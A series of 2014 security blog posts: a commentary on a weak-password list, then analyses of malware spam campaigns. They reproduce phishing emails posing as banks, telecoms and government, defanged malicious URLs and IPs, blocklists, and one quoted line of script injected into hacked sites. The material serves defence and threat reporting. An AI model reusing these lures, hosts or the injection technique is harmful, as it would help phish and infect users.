Password hand-wringing misses the point

Recently doing the rounds of news outlets is a list compiled by SplashData of weak passwords found in data breaches in 2013. There's nothing wrong with this list, but as ever, the media completely miss the point.

SplashData's list is as follows:

Rank	Password	Change from 2012
1	123456	Up 1
2	password	Down 1
3	12345678	Unchanged
4	qwerty	Up 1
5	abc123	Down 1
6	123456789	New
7	111111	Up 2
8	1234567	Up 5
9	iloveyou	Up 2
10	adobe123	New
11	123123	Up 5
12	admin	New
13	1234567890	New
14	letmein	Down 7
15	photoshop	New
16	1234	New
17	monkey	Down 11
18	shadow	Unchanged
19	sunshine	Down 5
20	12345	New
21	password1	Up 4
22	princess	New
23	azerty	New
24	trustno1	Down 12
25	000000	New

The presence of "adobe123" and "photoshop" as passwords show the influence of the Adobe data breach on the list. Back in 2010 when Gawker was breached, one of the popular passwords was.. you guessed it.. "gawker".

The media has a habit of picking up the wrong point.. they look at a password of "123456" and ask how can anyone be so stupid to use it? But my somewhat NSFW response is what the fuck does it matter?

Almost everything these days requires registration for which you need to supply an email address and password, and often for trivial things. One of the reasons that gawker featured so highly in the Gawker breach was that to the vast majority of users it matters not one jot if someone hacks into their account. The same is true for a lot of Adobe users.. in most cases the accounts are of absolutely no value to an attacker, so it really doesn't matter if you have adobe123 as a password or not.

So, the media (or at least some of it) says that you should choose a secure password such as fJ4C62GY0I8C15D but their advice is misleading because the real problem is password re-use and not the security of the password per se.

Despite the obvious security problems in doing so, many sites store passwords in plain text or in an insufficiently encrypted format. In these cases, it doesn't matter how secure your password is because the attackers will just be able to read it. Even in cases where the password is encrypted, with enough time and/or rainbow tables the password can often be determined, even it is a complex one.

And if you have re-used that email address and password on other sites.. well, you're buggered basically.

In an ideal world, you would have a nicely secure password for each site and you would remember it in your head. But of course, that's practically impossible, so one option is to use a password manager (SplashData themselves make these) to remember them all for you. There are several different password managers available, but of course there is always the possibility that one of these tools might get hacked itself which could be catastrophic for users.

If you don't want to use a password manager, then you'll have to do it the old-fashioned way, and either remember your passwords or store them in some other manner. You should always have a secure and unique password for your web mail, banking/finance, work and major shopping sites. But for all the cruft that you have to register, there's probably little harm in using a password that it easy to remember. Does it matter if the password I use for ranting at the BBC is abc123? Perhaps it doesn't.

But perhaps one problem is that there are simply too many times that you have to create an account in the first place. Sometimes it is nice to come across a retailer (for example) that will allow you to order stuff without creating a damned account.. something that seems to go against the grain, but it does mean that there's one less password to worry about..

Something evil on 5.254.96.240 and 185.5.55.75

This malware attack appears to be aimed at German speakers, and is presumably spreading through spam although I don't have a sample of the email message. What I do have is a nasty EXE-in-ZIP payload that masquerades as a bill or other communication from Deutsche Telekom, Vodafone, Fiducia or Volksbank.


URLquery shows one such download in this example, the victim has been directed to [donotclick]gf-58.ru/telekom_deutschland which in turn downloads a ZIP file Rechnungsruckstande_9698169830015295.zip which in turn contains a malicious executable Mitteilung, Rechnungsruckstande 9901169820005294 Telekom Deutschland GmbH vom Januar 2014.exe which has a VirusTotal detection rate of 7/48.

The malware is downloaded from a server at 5.254.96.240 (Voxility, Romania). Sample URLs on this server (according to URLquery and VirusTotal) are:

[donotclick]gdevseesti.ru/telekom_deutschland/
[donotclick]gdevseesti.ru/vodafone_online/
[donotclick]gf-58.ru/telekom_deutschland/
[donotclick]gf-58.ru/volksbank_eg/
[donotclick]goodwebtut.ru/fiducia/
[donotclick]goodwebtut.ru/telekom_deutschland/
[donotclick]goodwebtut.ru/vodafone_online/
[donotclick]mnogovsegotut.ru/fiducia/
[donotclick]uiuim.ru/fiducia/

The Anubis report and ThreatExpert report [pdf] show that the malware calls home to dshfyyst.ru on 185.5.55.75 (UAB "Interneto vizija", Lithunia). There are some other suspect sites on the same server which may be worth blocking (see below).

All these sites are .ru domains registered to the infamous "Private Person" so there are no clues as to their ownership.

Recommended blocklist:
5.254.96.240
gf-58.ru
uiuim.ru
okkurp.ru
gdevseesti.ru
goodwebtut.ru
mnogovsegotut.ru
185.5.55.75
gossldirect.ru
dshfyyst.ru

Update: this appears to be Cridex aka Feodo, read more.

WhatsApp "A friend of yours has just sent you a pic" spam

This fake WhatsApp spam has a malicious attachment:

Date:      Mon, 20 Jan 2014 06:23:28 -0500 [06:23:28 EST]
From:      WhatsApp [{messages@whatsapp.com}]
Subject:      A friend of yours has just sent you a pic

Hey!

Someone you know has just sent you a pic in WhatsApp. Open attachments to see what it is.

� 2013 WhatsApp Inc

Attached to the message is a an archive file IMG9900882.zip which in turn contains a malicious exectuable IMG9900882.exe which has a VirusTotal detection rate of 20/49. The Malwr analysis gives few clues as to what the malware does, other automated analysis tools are inconclusive.

"Thank you for scheduling a payment to Bill Me Later" spam

This fake Bill Me Later spam has a malicious attachment:

Date:      Mon, 20 Jan 2014 14:23:08 +0000 [09:23:08 EST]
From:      Bill Me Later [service@paypal.com]
Subject:      Thank you for scheduling a payment to Bill Me Later

BillMeLater
   
Log in here
       
Your Bill Me Later® statement is now available!

Dear Customer,

Thank you for making a payment online! We've received your
Bill Me Later® payment of $1603.57 and have applied it to your account.

For more details please check attached file

Summary:

Your Bill Me Later Account Number Ending in: 0266

You Paid: $1603.57

Your Payment Date*: 01/20/2014

Your Payment Confirmation Number: 971892583971968191

Don't forget, Bill Me Later is the perfect way to shop when you want more time to pay for the stuff you need. Plus, you can always find great deals and discounts at over 1000 stores. Watch this short, fun video to learn more.

BillMeLater

*NOTE: If your payment date is Saturday, or a holiday, it will take an additional day for the payment to appear on your account. However, you will be credited for the payment as of the payment date.
Log in at PayPal.com to make a payment
Questions:
Do not reply to this email. Please send all messages through the email form on our website. We are unable to respond to account inquiries sent in reply to this email. Bill Me Later is located at 9690 Deereco Rd, Suite 110, Timonium, MD 21093 Copyright 2012 Bill Me Later Inc.

Bill Me Later accounts are issued by WebBank, Salt Lake City Utah

PQW688PP1

Attached is an archive file PP_03357442.zip which in turn contains a malicious executable PP_03357442.exe which has a VirusTotal detection rate of just 4/45. Automated analysis tools [1] [2] show an attempted connection to jatit.org on 72.9.158.240 (Colo4, US) which appears to be a legitimate (but presumably compromised) site.

"ACTION REQUIRED: A document has arrived for your review/approval (Document Flow Manager)" spam

This spam with a lengthy subject has a malicious attachment:

Date:      Thu, 16 Jan 2014 09:39:28 -0600 [10:39:28 EST]
From:      "support@salesforce.com" [support@salesforce.com]
Subject:      ACTION REQUIRED: A document has arrived for your review/approval (Document Flow Manager)
Priority:      High Priority 2

This message is for the designated recipient only and may contain privileged, proprietary, or otherwise private information. If you have received it in error, please notify the sender immediately and delete the original. Any other use of the email by you is prohibited.

Record ID: HJRQY9PSXBSK334

Supplier: http://[victimdomain.com]

Invoice No.: 5644366804

Document No.: 3319683775

Invoice amount: USD 0488.21

Rejection reason(s): Approval Required
Please find enclosed a record of invoice that could not be processed. We would like to ask you to assist us in resolving the noted rejection reasons. 

Attached is a file SFHJRQY9PSXBSK334.zip which in turn contains a malicious executable SF.EXE which has an icon that makes it look like a PDF file. This file has a very low detection rate at VirusTotal of 2/48. The Malwr analysis shows an attempted connection to centrum.co.id on 75.98.233.44 (Ceranet, US). This is the only site on that server, blocking either the IP or domain might be useful.

Ongoing Fake flash update via .js injection and SkyDrive, Part I

Over the past few days I have seen several cases where legitimate websites have had .js files interfered with in order to serve up something malicious.

Here is a case in point.. the German website physiomedicor.de has been hacked to serve up a fake Flash download, as can be seen from this URLquery report. In this case it's pretty easy to tell what's going on from the URLquery screenshot:

What has happened is that somehow an attacker has altered several .js files on the victim's site and has appened extra code. In this case the code has been appened to [donotclick]www.physiomedicor.de/assets/rollover.js  as follows (click to enlarge):

In this case the code injected tries to load a script from a hijacked site [donotclick]ghionmedia.com/PROjes/goar2RAn.php?id=56356336 but this isn't the first time that I've seen this format of URL injected into a script today as I've seen these other two (also using hijacked sites) as well:

[donotclick]berriesarsuiz.com/ptc84vRb.php?id=117515949
[donotclick]www.karsons.co.uk/qdrX3tDB.php?id=114433444

This second script was found in the high-profile ilmeteo.it hack earlier today, but I've seen it over the past couple of days in other attacks too. The format of the script and method of the attack are too similar to be a coincidence.

This first script [pastebin] identifies itself as coming from Adscend Media LLC .. but of course that's just a comment in the script and could be fake, so let's dig a little deeper.  The key part of this script is a line that says:

document.getElementById('gw_iframe').src = 'http://ghionmedia.com/PROjes/imgfiles/b.html';

..that leads to this script [pastebin] and apart from a load of other stuff you can clearly see another reference to Adscend Media and adscendmedia.com:

    function openpp() {
        //newwindow = window.open("https://adscendmedia.com/pp_click.php?aff=8663&gate=18120&sid=&p=aHR0cDovL3Nob3ctcGFzcy5jb20v", '_blank');
    }

The adscendmedia.com link contains an aff=8663 affiliate ID which indicates that some other party other than Adscend Media LLC may be responsible. This link comes up black when I try to follow it, which might mean a number of things (even the possibility that Adscend Media have terminated the affiliate).

The "other stuff" I mentioned includes a download from skydrive.live.com which is the same thing mentioned in this F-Secure post yesterday. (You can read more about this in Part II)

Adscend Media say that the affiliate was suspended from their network (see the comments below) and they have no control over the code that is showing. Specifically:

..these attacks are not using our advertising services in ANY way. They simply have copied the Javascript code of our content-locking product and used it for their own purposes. Therefore to call this "an Adscend Media ad" is not accurate. In the previous case, there was a commented-out line of Javascript code (where they had replaced our code with their new code), and we were able to see an account number of the person who copied our script, and we suspended the account, however at no point has our real service been used to spread malware. If a person were to copy HTML source code from this page, and use it on a blog that infects users with malware, it would be damaging to your name to repeatedly tie you to something over which you have no control, and that is what is happening here with our company.

You can read part 2 of the analysis here.

Cushion Redirect sites using hijacked GoDaddy domains to block

A very quick write-up about some suspect activity on 194.28.175.129 (BESTHOSTING-AS ON-LINE Ltd, Ukraine) which appears to be hosting some Cushion Redirect domains (explained here) which is being injected into certain sites such as the one in this URLquery report.

A brief examination of the server shows several subdomains of hijacked GoDaddy domains being used for malicious redirects:

d6ld9uir6jgsgasgtfpoff7.yourchicagohummerlimo.com
ht6u1tyyljcketu4b938smf50395383e2197583fa67bd84d474af039.yourbestpartybus.com
770pa3hd21uo1q7wqa5thgh.amateurloginfree.com
d6ld9uir6jgsgasgtfpoff74159538404f0858918145d34c8200d5a7.yourchicagohummerlimo.com
xxctp7yqtwncubsewi6t7pp.yourchicagocarservice.com
63t31l30mdhlep1d0kx82tn70845384049a336c6dc8d7ede92b1d341.yourchicagogranite.com
qxwnnzei6redpxlwbfz1cxg.amateurloginfree.com
ht6u1tyyljcketu4b938smf.amateurloginfree.com
ht6u1tyyljcketu4b938smf50395383e20f64a2782cfdac4ee94285a.yourbestpartybus.com
y1ji3w0l1teth2ydh2k0epj.allgaysitespassfree.com

The hijacked GoDaddy domains in question are:
allgaysitespassfree.com
amateurloginfree.com
yourchicagocarservice.com
yourchicagogranite.com
yourchicagohummerlimo.com
yourbestpartybus.com

A quick look at the Google stats for AS42655 indicate to me personally that blocking 194.28.172.0/22 might be a prudent idea if you don't have any reason to send traffic to Ukrainian sites.

ilmeteo.it hacked

Popular Italian weather site ilmeteo.it appears to have been compromised this morning, with several legitimate .js files on the site altered to drive traffic towards a malicious hacked domain at karsons.co.uk.

The payload is unclear because at the moment the payload site itself is out of bandwidth. It could either be a malware payload or possibly a rogue ad network (which could also be used to spread malware).

According to Alexa statistics, itlmeteo.it is the 29th most popular site in Italy and the 1305th most popular worlwide.

This URLquery report shows the scripts with the injected code:

The injection attempts to run code at [donotclick]www.karsons.co.uk/qdrX3tDB.php?id=114433444 and it can be found in the site's .js files (for example [donotclick]http://www.ilmeteo.it/im10.js). Right at the moment the site has exceeded its bandwidth and is erroring out.

It's hard to say exactly what the payload is or how many users may have been impacted. I've seen a few of these attacks recently that look like they are linked to a rogue ad network, but I can't confirm it in this case.

Update: site appears to be clean as of 1133 CET according to URLquery.

Staples "Your order is awaiting verification!" spam

This fake Staples spam has a malicious attachment:

Date:      Wed, 15 Jan 2014 15:40:44 +0800 [02:40:44 EST]
From:      Staples Advantage Orders [Order@staplesadvantage.com]
Subject:      Your order is awaiting verification!
                                           
Order Status: Awaiting verification
Order #: 5079728
Your order has been submitted and is awaiting verification from you.
Order #:     5079728
Order Date and Eastern Time:     2/19/2013 12:28 PM
Order Total:     $152.46
   
This is potentially due to missing or invalid order or payment information. If you receive this status message, please call Customer Service immediately for assistance.
For Staples Advantage Support, call 1-800-633-6080 or email Support@staplesadvantage.com.

Attached is a ZIP file Order_5079728.zip which in turn contains a malicious executable  Order_{_partorderb}.exe which has a VirusTotal detection rate of 23/47.  The Malwr report is pretty inconclusive, so presumably the binary is hardened against automated analysis tools.

PG&E "Gas and Electric Usage Statement" spam

This fake spam from the Pacific Gas & Electric company is presumably meant to have a malicious payload, but all I get is a server error..

From:     PG&E [do_not_reply@sourcefort.com]
Reply-To: PG&E [do_not_reply@sourcefort.com]
Date:     14 January 2014 22:37
Subject:     Gas and Electric Usage Statement

PG & E ENERGY STATEMENT             Account No: 718198305-5
                                                Statement Date: 01/10/2014
                                                Due Date: 02/01/2014
Your Account Summary

Amount Due on Previous Statement           $344.70
Payment(s) Recieved Since Last Statement   0.0 

Previous Unpaid Balance                    $344.70

Current Electric Charges                   $165.80
Current Gas Charges                        49.20   

Total Amount Due BY 02/01/2014 $559.7

To view your most recent statement, please click here You must log-in to your account or register for an online account to view your statement.
 
Total Amount Due BY 02/01/2014 $559.7

To give PG&E full credit, they have a link on their homepage about it and a full warning here. These scam emails seem to have been doing the rounds for quite a few days now.

"Uncensored download" spam leads to adware

I've been plagued with these over the past few days, emails coming in with the following subjects:

Underground XXX files
Free porno torrents
Uncensored download

The body text contains just a link to [donotclick]goinst.com/download/getfile/1205000/0/?q=Uncensored%20download

In turn this downloads a file Uncensored download__3516_i263089565_il6090765.exe and of course that's about as trustworthy as a van with "FREE CANDY" scrawled on the side. In blood.

A quick look at the EXE in VirusTotal indicates that it's some sort of Adware, probably pay-per-install. An examination of the binary shows a digital signature for Shetef Solutions & Consulting (1998) Ltd who are probably not behind the spam run, but are probably inadvertently paying the spammers for installations.

A Malwr analysis of the file can be found here.

Avoid.

HSBC "Payment Advice" spam / Payment Advice.exe

This fake HSBC spam comes with a malicious attachment:

Date:      Tue, 14 Jan 2014 11:57:29 -0300 [09:57:29 EST]
From:      HSBC Advising Service [advising.service.738805677.728003.693090157@mail.hsbcnet.hsbc.com]
Subject:      Payment Advice - Advice Ref:[G72282154558] / Priority payment / Customer Ref:[63 434S632U9I]


Sir/Madam

The attached payment advice is issued at the request of our customer. The advice is for your reference only.

Yours faithfully

Global Payments and Cash Management

HSBC

***************************************************************************

This is an auto-generated email, please DO NOT REPLY. Any replies to this email will be disregarded.

***************************************************************************

This e-mail is confidential. It may also be legally privileged. If you are not the addressee you may not copy, forward, disclose or use any part of it. If you have received this message in error, please delete it and all copies from your system and notify the sender immediately by return e-mail.

***************************************************************************

"SAVE PAPER - THINK BEFORE YOU PRINT!"

The is an attachment Payment Advice [G72282154558].zip which contains an executable Payment Advice.exe with a VirusTotal detection rate of 12/48. Automated analysis by Comodo CAMAS shows an attempted connection to thebostonshaker.com on 206.190.147.139 (Salt Lake City Hosting, US). It is the only site on this IP address, blocking either temporarily may give some protection.

"Department of Treasury Notice of Outstanding Obligation" spam

This US Treasury spam (but apparently sent from salesforce.com) has a malicious attachment:

Date:      Mon, 13 Jan 2014 18:54:16 +0700 [06:54:16 EST]
From:      "support@salesforce.com" [support@salesforce.com]
Subject:      Department of Treasury Notice of Outstanding Obligation - Case H6SYVMK704BX4AL

Important  please review and sign the attached document!

We have received notification from the Department of the Treasury,
Financial Management Service (FMS) that you have an outstanding
obligation with the Federal Government that requires your immediate
attention.

In order to ensure this condition does not affect any planned
contract or grant activity, please review and sign the attached document and if
you are unable to understand the attached document please call FMS at 1-800-304-3107
to address this issue.  Please make sure the person making the telephone call has the
Taxpayer Identification Number available AND has the authority/knowledge
to discuss the debt for the contractor/grantee.

Questions should be directed to the Federal Service Desk at:

http://www.bpn.gov/ccr/Help.aspx
Phone : 1-866-606-5048
Int. Phone 1-344-206-5406 for international calls
For DSN, dial 809-463-3029. Wait for a dial tone, and then dial 866-606-5472. 

Attached is a file FMS-Case-H6SYVMK704BX4AL.zip (VirusTotal detection rate 7/47) which in turn contains a malicious executable FMS-Case-{_Case_DIG}.exe (detection rate also 7/47). The Malwr analysis shows an attempted connection to anggun.my.id on 38.99.253.234 (Cogent, US). This seems to be the only domain on that server, blocking either may be prudent.